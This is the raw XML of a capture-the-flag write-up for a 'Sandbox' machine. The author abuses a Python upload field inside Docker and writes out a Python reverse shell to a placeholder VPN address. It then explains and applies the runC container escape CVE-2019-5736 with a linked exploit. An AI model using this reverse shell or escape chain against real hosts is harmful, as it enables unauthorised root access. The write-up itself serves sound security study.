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Sandbox ENG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5326bgmeb4aq" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>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Ports:</w:t>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E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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21100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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website, we see an upload field, so we will upload a Python file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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print(1+2)</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54400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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our Python code was processed and is running inside a Docker container. We can try importing the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 to execute system commands. Since this is a sandbox, we might need to bypass restrictions — or maybe not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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1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os.system("whoami")</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24300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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command was successfully executed.</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create a reverse shell in Python:</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pty</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socket</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subprocess</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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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s.connect(("&lt;IP-VPN&gt;",443))</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0)</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1)</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2)</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pty.spawn("/bin/bash")</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payload, we receive the shell =)</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5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which is located inside the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sss_source.py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6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97bl0aj4k8s" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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2B">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qa7kckqon07" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-5736</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html</w:t>
        </w:r>
      </w:hyperlink>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k13qr4nxvxtj" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss</w:t>
        </w:r>
      </w:hyperlink>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cisjil9rmi0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vulnerability</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analyze the vulnerability overview provided by the runC team:</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vulnerability allows a malicious container (with minimal user interaction) to overwrite the host’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">runc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and thus achieve root-level code execution on the host. The required level of user interaction is the ability to execute any command as root inside a container in one of the following contexts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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Creating a new container using an image controlled by the attacker;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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Attaching (docker exec) to an existing container to which the attacker previously had write access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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vgvmhwlfckw2" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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c4cviqfgs0b" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Libraries Approach</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the runC process is executed in the container, these libraries are loaded into the runC process by the dynamic linker. It is possible to replace one of these libraries with a malicious version, which will overwrite the runC binary when loaded into the runC process.</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Below is a summary of how the exploit works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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runC process loads the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libseccomp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 and transfers execution to the </w:t>
      </w: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opens the runC binary for reading via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This creates a file descriptor at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/fd/${runc_fd_read}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calls </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execve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execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite_runc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A">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process is no longer executing the runC binary; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite_runc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> opens </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/fd/runc_fd_read</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for writing and overwrites the runC binary.</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leave a link below explaining how the exploit works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=zsYe3AGgEng</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/</w:t>
        </w:r>
      </w:hyperlink>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use a ready-made exploit from the link below:</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hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss</w:t>
        </w:r>
      </w:hyperlink>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files to our machine, we will begin modifying them.</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first step is to edit the server URL (IP) and our VPN IP, which will be used for downloading files into Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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sss.py</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79800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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09900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">new_runc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and insert our reverse shell payload.</w:t>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6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start a Python server to host our files.</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6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execute the script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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python3 sss.py</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shell =)</w:t>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6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retrieve our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">last flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is stored in an environment variable.</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6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4" name="image4.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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4">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5">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Sandbox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2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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hyperlink" Target="https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=zsYe3AGgEng" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-57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m4ZzkPlml/ZLnoSgle/voYR9g==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjUzMjZiZ21lYjRhcTIOaC53OTdibDBhajRrOHMyDWgucWE3a2NrcW9uMDcyDmguazEzcXI0bnh2eHRqMg5oLnBjaXNqaWw5cm1pMDIOaC52Z3ZtaHdsZmNrdzIyDmgud2M0Y3ZpcWZnczBiMg5oLjE3NWY1Y3M5NHowbzgAciExRWRUN1gyakg3VDFlREJRQU5EWUJjVW1XM3dMLU1Pb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